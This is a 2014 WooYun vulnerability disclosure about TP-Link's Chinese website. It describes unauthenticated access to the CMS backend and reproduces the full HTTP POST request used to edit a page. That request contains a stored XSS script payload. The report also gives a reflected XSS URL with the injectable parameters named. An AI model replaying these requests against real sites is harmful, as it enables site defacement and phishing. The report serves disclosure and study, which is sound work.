当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-047640

漏洞标题:tplink官网后台部分功能未授权访问

相关厂商:深圳普联技术有限公司

漏洞作者: 白非白

提交时间:2014-01-02 11:09

修复时间:2014-01-07 11:09

公开时间:2014-01-07 11:09

漏洞类型:未授权访问/权限绕过

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-02: 细节已通知厂商并且等待厂商处理中
2014-01-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

权限控制不严(附送XSS)

详细说明:

后台权限控制不严,随意访问http://www.tp-link.com.cn/cms/main.aspx,并修改http://smb.tp-link.com.cn分站内容。

QQ截图20140102011815.jpg


用burp抓包修改,发如下包更改内容

POST /cms/editsmbstory.asp?action=save&storyId=62 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/QVOD, application/QVOD, application/xaml+xml, application/x-ms-xbap, application/x-ms-application, */*
Referer: http://www.tp-link.com.cn/cms/editsmbstory.asp?action=edit
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0;  Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.tp-link.com.cn
Content-Length: 11041
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASPSESSIONIDQSBTCDQA=BHOEBDIBDFNNMNGIAKIJMIGP; pIndex=4; __utma=57203823.1976171182.1388577454.1388586717.1388589655.3; __utmc=57203823; __utmz=57203823.1388589655.3.3.utmcsr=service.tp-link.com.cn|utmccn=(referral)|utmcmd=referral|utmcct=/detail_article_86.html; ASP.NET_SessionId=gw0zljjclivyd41wt0vf3m0u
classId=2&title=TP-LINK%E5%95%86%E7%94%A8%E5%90%B8%E9%A1%B6%E5%BC%8FAP%E5%8A%A9%E5%8A%9BMUSE%E9%85%92%E5%90%A7%E5%BE%90%E5%B7%9E%E5%BA%97%E6%89%93%E9%80%A0%E4%BC%98%E8%B4%A8%E6%97%A0%E7%BA%BF%E7%BD%91%E7%BB%9C&displayorder=58&updatedate=2013%2F12%2F4&detail=%0D%0A%3Cp+style%3D%22text-indent%3A0%22%3E%3Cb%3E%E5%AE%A2%E6%88%B7%E4%BB%8B%E7%BB%8D%EF%BC%9A%3C%2Fb%3E%3C%2Fp%3E%0D%0A%3Cscript%3Ealert%28vulnerable%29%3C%2Fscript%3E%3Cp+%3E%7C%E7%99%BD%E9%9D%9E%E7%99%BD%40wooyun%7C%E5%88%B0%E6%AD%A4%E4%B8%80%E6%B8%B8++MUSE%E9%85%92%E5%90%A7%E5%BE%90%E5%B7%9E%E5%BA%97%E6%98%AF%E4%B8%80%E5%AE%B6%E7%8B%AC%E5%85%B7%E7%89%B9%E8%89%B2%E7%9A%84%E6%97%B6%E5%B0%9A%E9%85%92%E5%90%A7%EF%BC%8C%E8%A3%85%E6%BD%A2%E5%B0%8A%E8%B4%B5%E5%85%B8%E9%9B%85%E5%8F%88%E5%AF%8C%E6%9C%89%E7%8E%B0%E4%BB%A3%E6%B0%94%E6%81%AF%2C%E5%AE%83%E4%BB%A5%E4%B8%80%E7%A7%8D%E5%85%A8%E6%96%B0%E7%9A%84%E9%A3%8E%E6%A0%BC%EF%BC%8C%E5%A1%91%E9%80%A0%E4%BA%86%E4%B8%80%E4%B8%AA%E8%87%AA%E7%94%B1%E8%87%AA%E5%9C%A8%E7%9A%84%E6%AD%8C%E8%88%9E%E3%80%81%E7%95%85%E9%A5%AE%E7%A9%BA%E9%97%B4%EF%BC%8C%E6%98%AF%E5%B7%A5%E4%BD%9C%E4%B9%8B%E4%BD%99%E6%B6%88%E9%81%A3%E5%92%8C%E6%94%BE%E6%9D%BE%E7%9A%84%E5%A5%BD%E5%9C%B0%E6%96%B9%E3%80%82%3C%2Fp%3E%0D%0A%0D%0A%3Cdiv+style%3D%22text-align%3Acenter%22%3E%3Cimg+src%3D%22%2Fpages%2Fimageuploadfolder%2F20131204%2Flogo.jpg%22+%2F%3E%3C%2Fdiv%3E%0D%0A%3Cp+style%3D%22text-indent%3A0%22%3E%3Cb%3E%E5%BA%94%E7%94%A8%E8%83%8C%E6%99%AF%EF%BC%9A%3C%2Fb%3E%3C%2Fp%3E%0D%0A%3Cp+%3E%09%E9%9A%8F%E7%9D%80%E6%97%A0%E7%BA%BF%E9%80%9A%E4%BF%A1%E6%8A%80%E6%9C%AF%E7%9A%84%E5%B9%BF%E6%B3%9B%E5%BA%94%E7%94%A8%EF%BC%8C%E4%BC%A0%E7%BB%9F%E7%BD%91%E7%BB%9C%E5%B7%B2%E7%BB%8F%E8%B6%8A%E6%9D%A5%E8%B6%8A%E4%B8%8D%E8%83%BD%E6%BB%A1%E8%B6%B3%E4%BA%BA%E4%BB%AC%E7%9A%84%E9%9C%80%E6%B1%82%EF%BC%8C%E4%BA%8E%E6%98%AF%E6%97%A0%E7%BA%BF%E7%BD%91%E7%BB%9C%E5%BA%94%E8%BF%90%E8%80%8C%E7%94%9F%EF%BC%8C%E4%B8%94%E5%8F%91%E5%B1%95%E8%BF%85%E9%80%9F%E3%80%82%E8%BF%91%E5%B9%B4%E6%9D%A5%E7%9A%84%E6%97%A0%E7%BA%BF%E7%BD%91%E7%BB%9C%E4%BA%A7%E5%93%81%E9%80%90%E6%B8%90%E8%B5%B0%E5%90%91%E6%88%90%E7%86%9F%EF%BC%8C%E6%AD%A3%E4%BB%A5%E5%AE%83%E4%BC%98%E8%B6%8A%E7%9A%84%E7%81%B5%E6%B4%BB%E6%80%A7%E5%92%8C%E4%BE%BF%E6%8D%B7%E6%80%A7%E5%9C%A8%E7%BD%91%E7%BB%9C%E5%BA%94%E7%94%A8%E4%B8%AD%E5%8F%91%E6%8C%A5%E6%97%A5%E7%9B%8A%E9%87%8D%E8%A6%81%E7%9A%84%E4%BD%9C%E7%94%A8%E3%80%82%3C%2Fp%3E%0D%0A%3Cp+%3E%09%E9%85%92%E5%90%A7%E4%BD%9C%E4%B8%BA%E9%AB%98%E6%A1%A3%E7%9A%84%E5%A8%B1%E4%B9%90%E5%9C%BA%E6%89%80%EF%BC%8C%E6%89%93%E9%80%A0%E4%BC%98%E8%B4%A8%E7%9A%84%E6%97%A0%E7%BA%BF%E7%BD%91%E7%BB%9C%E8%83%BD%E4%B8%BA%E9%A1%BE%E5%AE%A2%E5%B8%A6%E6%9D%A5%E6%9B%B4%E5%A5%BD%E7%9A%84%E5%A8%B1%E4%B9%90%E4%BD%93%E9%AA%8C%EF%BC%8C%E6%8F%90%E9%AB%98%E7%94%A8%E6%88%B7%E5%AF%B9%E9%85%92%E5%90%A7%E7%9A%84%E6%BB%A1%E6%84%8F%E5%BA%A6%E3%80%82%3C%2Fp%3E%0D%0A%3Cp+style%3D%22text-indent%3A0%22%3E%3Cb%3E%E5%AE%A2%E6%88%B7%E9%9C%80%E6%B1%82%EF%BC%9A%3C%2Fb%3E%3C%2Fp%3E%0D%0A%3Cp+%3E%E3%80%901%E3%80%91%C2%A0%E5%85%A8%E9%9D%A2%E7%9A%84%E6%97%A0%E7%BA%BF%E8%A6%86%E7%9B%96%EF%BC%9B+%3C%2Fp%3E%0D%0A%3Cp+%3E%E3%80%902%E3%80%91%C2%A0%E9%85%92%E5%90%A7%E4%BA%BA%E6%B5%81%E5%AF%86%E9%9B%86%2C%E8%A6%81%E6%B1%82%E8%83%BD%E5%A4%9F%E5%9C%A8%E6%99%9A%E4%B8%8A%E4%BA%BA%E6%B5%81%E8%BE%BE%E5%88%B0%E9%AB%98%E5%B3%B0%E6%9C%9F%E7%9A%84%E6%97%B6%E5%80%99%E9%A1%BA%E7%95%85%E5%9C%B0%E4%BD%BF%E7%94%A8WIFI%EF%BC%9B%3C%2Fp%3E%0D%0A%3Cp+%3E%E3%80%903%E3%80%91%C2%A0%E6%8F%90%E4%BE%9B%E5%8F%AF%E9%9D%A0%E7%9A%84%E5%B8%A6%E5%AE%BD%E6%8E%A5%E5%85%A5%EF%BC%8C%E6%BB%A1%E8%B6%B3%E5%85%85%E8%B6%B3%E7%9A%84%E7%BB%88%E7%AB%AF%E6%8E%A5%E5%85%A5%E6%95%B0%E9%87%8F%EF%BC%8C%E4%BF%9D%E8%AF%81%E6%97%A0%E7%BA%BF%E7%BD%91%E7%BB%9C%E9%AB%98%E6%95%88%E3%80%81%E7%A8%B3%E5%AE%9A%EF%BC%9B%3C%2Fp%3E%0D%0A%3Cp+%3E%E3%80%904%E3%80%91%C2%A0%E7%BB%9F%E4%B8%80%E7%AE%A1%E7%90%86%E3%80%81%E9%85%8D%E7%BD%AE%EF%BC%8C%E5%AE%9E%E6%97%B6%E7%9B%91%E6%8E%A7%E5%90%84%E6%8E%A5%E5%85%A5%E7%82%B9%E8%BF%90%E8%A1%8C%E7%8A%B6%E5%86%B5%EF%BC%9B%3C%2Fp%3E%0D%0A%3Cp+%3E%E3%80%905%E3%80%91%C2%A0%E9%AB%98%E6%80%A7%E4%BB%B7%E6%AF%94%EF%BC%8C%E6%95%B4%E4%BD%93%E6%96%B9%E6%A1%88%E4%BF%9D%E8%AF%81%E5%AE%89%E5%85%A8%E7%A8%B3%E5%AE%9A%E7%9A%84%E5%89%8D%E6%8F%90%E4%B8%8B%EF%BC%8C%E5%90%88%E7%90%86%E6%8E%A7%E5%88%B6%E6%88%90%E6%9C%AC%EF%BC%9B%3C%2Fp%3E%0D%0A%3Cp+%3E%E3%80%906%E3%80%91%C2%A0%E5%AE%8C%E5%96%84%E7%9A%84%E5%94%AE%E5%89%8D%E5%94%AE%E5%90%8E%E6%94%AF%E6%8C%81%E3%80%82%3C%2Fp%3E%0D%0A%3Cp+style%3D%22text-indent%3A0%22%3E%3Cb%3E%E8%A7%A3%E5%86%B3%E6%96%B9%E6%A1%88%EF%BC%9A%3C%2Fb%3E%3C%2Fp%3E%0D%0A%3Cdiv+style%3D%22text-align%3Acenter%22%3E%3Cimg+src%3D%22%2Fpages%2Fimageuploadfolder%2F20131204%2Fsmb1.jpg%22+%2F%3E%3C%2Fdiv%3E%0D%0A%3Cp+%3E%09%E6%96%B9%E6%A1%88%E9%80%89%E7%94%A8TL-ER6520G%E4%BD%9C%E4%B8%BA%E4%B8%BB%E8%B7%AF%E7%94%B1%EF%BC%8C%E5%85%B7%E5%A4%87%E5%BC%BA%E5%A4%A7%E7%9A%84%E7%BD%91%E7%BB%9C%E6%95%B0%E6%8D%AE%E8%BD%AC%E5%8F%91%E8%83%BD%E5%8A%9B%EF%BC%8C%E9%80%82%E5%90%88%E7%BB%84%E5%BB%BA%E5%AE%89%E5%85%A8%E3%80%81%E9%AB%98%E6%95%88%E5%92%8C%E6%98%93%E7%AE%A1%E7%90%86%E7%9A%84%E7%BD%91%E7%BB%9C%EF%BC%8C%E5%85%A8%E9%9D%A2%E6%9C%89%E6%95%88%E7%9A%84%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%EF%BC%8C%E5%8F%AF%E6%9C%89%E6%95%88%E7%AE%A1%E6%8E%A7%E5%8C%85%E6%8B%ACP2P%E8%BD%AF%E4%BB%B6%E7%AD%89%E7%9A%84%E4%B8%8A%E7%BD%91%E5%BA%94%E7%94%A8%EF%BC%8C%E4%BF%9D%E8%AF%81%E7%BD%91%E7%BB%9C%E7%9A%84%E7%A8%B3%E5%AE%9A%EF%BC%8C%E7%81%B5%E6%B4%BB%E7%9A%84%E6%B5%81%E9%87%8F%E6%8E%A7%E5%88%B6%EF%BC%8C%E5%8F%AF%E9%92%88%E5%AF%B9%E7%BD%91%E7%BB%9C%E4%B8%AD%E6%AF%8F%E4%B8%80%E5%8F%B0%E4%B8%BB%E6%9C%BA%EF%BC%88IP%EF%BC%89%E8%BF%9B%E8%A1%8C%E5%8F%8C%E5%90%91%E5%B8%A6%E5%AE%BD%E6%8E%A7%E5%88%B6%EF%BC%8C%E4%BF%9D%E9%9A%9C%E7%BD%91%E7%BB%9C%E6%97%B6%E5%88%BB%E7%95%85%E9%80%9A%E3%80%82+%3C%2Fp%3E%0D%0A%3Cp+%3E%E9%80%89%E7%94%A8TL-SL2226P%E5%81%9A%E4%B8%BAPoE%E4%BA%A4%E6%8D%A2%E6%9C%BA%EF%BC%8CPoE%E7%89%B9%E6%80%A7%E7%AC%A6%E5%90%88IEEE+802.3at%E5%8F%8AIEEE+802.3af%E6%A0%87%E5%87%86%EF%BC%8C%E8%87%AA%E5%8A%A8%E6%A3%80%E6%B5%8B%E4%B8%8E%E8%AF%86%E5%88%AB%E7%AC%A6%E5%90%88IEEE+802.3at%E5%8F%8AIEEE+802.3af%E6%A0%87%E5%87%86%E7%9A%84%E8%AE%BE%E5%A4%87%E5%B9%B6%E4%B8%BA%E5%85%B6%E4%BE%9B%E7%94%B5%EF%BC%8C%E8%AE%BE%E5%A4%87%E6%94%AF%E6%8C%81%E6%A0%87%E5%87%86%E7%9A%84IEEE+802.1Q%E7%9A%84Tag+VLAN%EF%BC%8C%E6%BB%A1%E8%B6%B3%E5%88%92%E5%88%86%E5%92%8C%E7%AE%A1%E7%90%86%E7%BD%91%E7%BB%9C%E8%B5%84%E6%BA%90%E7%9A%84%E9%9C%80%E6%B1%82%EF%BC%8C%E5%A2%9E%E5%BC%BA%E7%BD%91%E7%BB%9C%E7%9A%84%E5%AE%89%E5%85%A8%E6%80%A7%E5%92%8C%E9%80%82%E5%BA%94%E5%A4%9A%E4%B8%9A%E5%8A%A1%E5%BA%94%E7%94%A8%E7%9A%84%E8%83%BD%E5%8A%9B%E3%80%82+%3C%2Fp%3E%0D%0A%3Cp+%3E%09%E9%80%89%E7%94%A8TL-AP300C-POE%E5%81%9AAP%E6%8E%A5%E5%85%A5%E7%82%B9%E8%AE%BE%E5%A4%87%EF%BC%8C%E6%97%A0%E7%BA%BF%E6%80%A7%E8%83%BD%E4%BC%98%E8%B6%8A%EF%BC%8C%E8%A6%86%E7%9B%96%E8%8C%83%E5%9B%B4%E5%B9%BF%E3%80%81%E6%95%88%E6%9E%9C%E5%BC%BA%E3%80%82%E9%87%87%E7%94%A8%E7%AE%80%E6%98%93%E5%90%B8%E9%A1%B6%E5%BC%8F%E5%AE%89%E8%A3%85%E6%96%B9%E5%BC%8F%EF%BC%8C%E7%BE%8E%E8%A7%82%E5%A4%A7%E6%96%B9%EF%BC%8C%E8%90%A5%E9%80%A0%E8%88%92%E9%80%82%E7%9A%84%E8%A7%86%E8%A7%89%E7%8E%AF%E5%A2%83%EF%BC%9B%E6%94%AF%E6%8C%81SSID+VLAN%E7%BB%91%E5%AE%9A%E3%80%81%E5%8A%9F%E7%8E%87%E8%B0%83%E8%8A%82%EF%BC%9B%E9%87%87%E7%94%A8802.3af%2Fat%E6%A0%87%E5%87%86PoE%E7%BD%91%E7%BA%BF%E4%BE%9B%E7%94%B5%EF%BC%9BAP%E9%9B%B6%E9%85%8D%E7%BD%AE%EF%BC%8C%E6%9C%89AC%EF%BC%88%E6%97%A0%E7%BA%BF%E6%8E%A7%E5%88%B6%E5%99%A8%EF%BC%89%E7%BB%9F%E4%B8%80%E7%AE%A1%E7%90%86%E3%80%82+%3C%2Fp%3E%0D%0A%3Cp+style%3D%22text-indent%3A0%22%3E%3Cb%3E%E6%96%B9%E6%A1%88%E7%89%B9%E7%82%B9%EF%BC%9A%3C%2Fb%3E%3C%2Fp%3E%0D%0A%3Cp+%3E%E3%80%901%E3%80%91%C2%A0%E6%BB%A1%E8%B6%B3%E9%85%92%E5%90%A7%E5%86%85%E6%97%A0%E7%BA%BF%E5%85%A8%E8%A6%86%E7%9B%96%E9%9C%80%E6%B1%82%EF%BC%8C%E4%BF%A1%E5%8F%B7%E8%A6%86%E7%9B%96%E8%8C%83%E5%9B%B4%E5%B9%BF%E3%80%81%E7%A8%B3%E5%AE%9A%E6%80%A7%E9%AB%98%EF%BC%9B%3C%2Fp%3E%0D%0A%3Cp+%3E%E3%80%902%E3%80%91%C2%A0%E9%80%9A%E8%BF%87%E5%90%88%E7%90%86%E7%9A%84%E9%85%8D%E7%BD%AETP-LINK+%E5%90%B8%E9%A1%B6AP%E5%92%8CTL-SL2226P%EF%BC%8C%E6%9C%89%E6%95%88%E7%9A%84%E4%BF%9D%E9%9A%9C%E4%BA%86%E5%9C%A8%E4%BA%BA%E6%B5%81%E9%AB%98%E5%B3%B0%E6%9C%9F%E7%9A%84%E6%97%B6%E5%80%99%EF%BC%8C%E4%B9%9F%E8%83%BD%E5%A4%9F%E9%A1%BA%E7%95%85%E7%9A%84%E4%BD%BF%E7%94%A8WIFI%EF%BC%9B%3C%2Fp%3E%0D%0A%3Cp+%3E%E3%80%903%E3%80%91%C2%A0AP%E7%BB%9F%E4%B8%80%E9%85%8D%E7%BD%AE%E7%AE%A1%E7%90%86%EF%BC%8C%E8%BF%90%E8%A1%8C%E7%BB%B4%E6%8A%A4%E6%96%B9%E4%BE%BF%EF%BC%9B%3C%2Fp%3E%0D%0A%3Cp+%3E%E3%80%904%E3%80%91%C2%A0%E6%96%B9%E6%A1%88%E9%80%89%E7%94%A8%E8%AE%BE%E5%A4%87%E5%AE%8C%E5%85%A8%E6%BB%A1%E8%B6%B3%E7%94%A8%E6%88%B7%E5%9F%BA%E6%9C%AC%E9%9C%80%E6%B1%82%EF%BC%8C%E4%BF%9D%E8%AF%81%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E3%80%81%E7%A8%B3%E5%AE%9A%EF%BC%8C%E6%80%A7%E4%BB%B7%E6%AF%94%E9%AB%98%EF%BC%9B%3C%2Fp%3E%0D%0A%3Cp+%3E%E3%80%905%E3%80%91%C2%A0%E6%8F%90%E4%BE%9B%E5%AE%8C%E5%96%84%E7%9A%84%E5%94%AE%E5%89%8D%E5%94%AE%E5%90%8E%E6%9C%8D%E5%8A%A1%EF%BC%8C%E4%BF%9D%E9%9A%9C%E7%94%A8%E6%88%B7%E7%BD%91%E7%BB%9C%E5%BB%BA%E8%AE%BE%E9%A1%BA%E5%88%A9%E3%80%82%3C%2Fp%3E%0D%0A%3Cp+style%3D%22text-indent%3A0%22%3E%3Cb%3E%E5%AE%89%E8%A3%85%E6%95%88%E6%9E%9C%EF%BC%9A%3C%2Fb%3E%3C%2Fp%3E%0D%0A%3Cdiv+style%3D%22text-align%3Acenter%22%3E%3Cimg+src%3D%22%2Fpages%2Fimageuploadfolder%2F20131204%2Fsmb2.jpg%22+%2F%3E%3C%2Fdiv%3E%0D%0A%0D%0A%3Cp+style%3D%22text-indent%3A0%22%3E%3Cb%3E%E7%9B%B8%E5%85%B3%E8%AE%BE%E5%A4%87%EF%BC%9A%3C%2Fb%3E%3C%2Fp%3E%0D%0A%3Ctable+border%3D%220%22+style%3D%22border%3Anone+%21important%22+cellpadding%3D%220%22+cellspacing%3D%220%22+width%3D%22100%25%22%3E%0D%0A++%3Ctr%3E%0D%0A++++%3Ctd+align%3D%22center%22%3E%3Ca+href%3D%22http%3A%2F%2Fwww.tp-link.com.cn%2Fproduct_281.html%22%3E%3Cimg+src%3D%22%2Fpages%2Fimageuploadfolder%2F20131204%2FTL-ER6520G.jpg%22+%2F%3E%3C%2Fa%3E%3C%2Ftd%3E%0D%0A++++%3Ctd+align%3D%22center%22%3E%3Ca+href%3D%22http%3A%2F%2Fwww.tp-link.com.cn%2Fproduct_344.html%22%3E%3Cimg+src%3D%22%2Fpages%2Fimageuploadfolder%2F20131204%2FTL-SL2226P.jpg%22+%2F%3E%3C%2Fa%3E%3C%2Ftd%3E%0D%0A++++%3Ctd+align%3D%22center%22%3E%3Ca+href%3D%22http%3A%2F%2Fwww.tp-link.com.cn%2Fproduct_328.html%22%3E%3Cimg+src%3D%22%2Fpages%2Fimageuploadfolder%2F20131127%2FTL-AC200.jpg%22+%2F%3E%3C%2Fa%3E%3C%2Ftd%3E%0D%0A++++%3Ctd+align%3D%22center%22%3E%3Ca+href%3D%22http%3A%2F%2Fwww.tp-link.com.cn%2Fproduct_325.html%22%3E%3Cimg+src%3D%22%2Fpages%2Fimageuploadfolder%2F20131127%2FTL-AP300C-POE.jpg%22+%2F%3E%3C%2Fa%3E%3C%2Ftd%3E%0D%0A++%3C%2Ftr%3E%0D%0A++%3Ctr%3E%0D%0A++++%3Ctd+align%3D%22center%22%3E%3Ca+href%3D%22http%3A%2F%2Fwww.tp-link.com.cn%2Fproduct_281.html%22%3ETL-ER6520G%3C%2Fa%3E%3C%2Ftd%3E%0D%0A++++%3Ctd+align%3D%22center%22%3E%3Ca+href%3D%22http%3A%2F%2Fwww.tp-link.com.cn%2Fproduct_344.html%22%3ETL-SL2226P%3C%2Fa%3E%3C%2Ftd%3E%0D%0A++++%3Ctd+align%3D%22center%22%3E%3Ca+href%3D%22http%3A%2F%2Fwww.tp-link.com.cn%2Fproduct_328.html%22%3ETL-AC200%3C%2Fa%3E%3C%2Ftd%3E%0D%0A++++%3Ctd+align%3D%22center%22%3E%3Ca+href%3D%22http%3A%2F%2Fwww.tp-link.com.cn%2Fproduct_325.html%22%3ETL-AP300C-POE%3C%2Fa%3E%3C%2Ftd%3E%0D%0A++%3C%2Ftr%3E%0D%0A%3C%2Ftable%3E%0D%0A&submit=%E4%BF%9D%E5%AD%98


更改后的内容http://smb.tp-link.com.cn/pages/story-detail.asp?d=62

QQ截图20140102020504.jpg


审查源码可以发现,我插入了下面的内容:

<script>alert(vulnerable)</script><p >|白非白@wooyun|到此一游


至于为什么跨站代码没执行,我就不清楚了,太菜了。想了一下这个漏洞的严重性,一般般,估计只能用来搞个SEO,搞搞钓鱼,所以漏洞等级定为中。
附送一个主站反射型XSS:
http://service.tp-link.com.cn/search.html?level1=1&level2=%CE%DE%CF%DFAP&product=TL-WA701N%3C%3E&kw=
参数level1,level2,product均可构造XSS(图片为firefox中测试):

QQ截图20140102021120.jpg


漏洞证明:

QQ截图20140102020504.jpg


QQ截图20140102021120.jpg

修复方案:

应该懂

版权声明:转载请注明来源 白非白@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-01-07 11:09

厂商回复:

漏洞Rank:8 (WooYun评价)

最新状态:

2014-01-27:谢谢反馈!

漏洞评价:

评论

  1. 2014-01-06 14:33 | 白非白 ( 普通白帽子 | Rank:447 漏洞数:60 | ♫ Freedom - Anthony Hamilton ♫)

    @深圳普联技术有限公司 @xsser 修复了也不来确认下?

  2. 2014-01-07 12:07 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    插入代码执行了。。alert()里头的是字符串,要加双引号

  3. 2014-01-07 12:25 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    @梧桐雨 妹子你好!

  4. 2014-01-07 15:38 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    @梧桐雨 妹子?

  5. 2014-01-07 16:35 | 白非白 ( 普通白帽子 | Rank:447 漏洞数:60 | ♫ Freedom - Anthony Hamilton ♫)

    @梧桐雨 o_o thx

  6. 2014-01-07 16:37 | 白非白 ( 普通白帽子 | Rank:447 漏洞数:60 | ♫ Freedom - Anthony Hamilton ♫)

    @疯狗 @xsser 厂商既修复了又忽略了,把rank也忽略了么。。。

  7. 2014-01-07 16:55 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @白非白 给你补了些另外希望厂商 @深圳普联技术有限公司 收取到白帽子提交的漏洞并且确认后,可以先在平台上进行个确认操作

  8. 2014-01-07 17:50 | 白非白 ( 普通白帽子 | Rank:447 漏洞数:60 | ♫ Freedom - Anthony Hamilton ♫)

    @疯狗 thx

  9. 2014-01-07 20:32 | HHHO ( 路人 | Rank:0 漏洞数:2 | wohoooo)

    @白非白 为你不平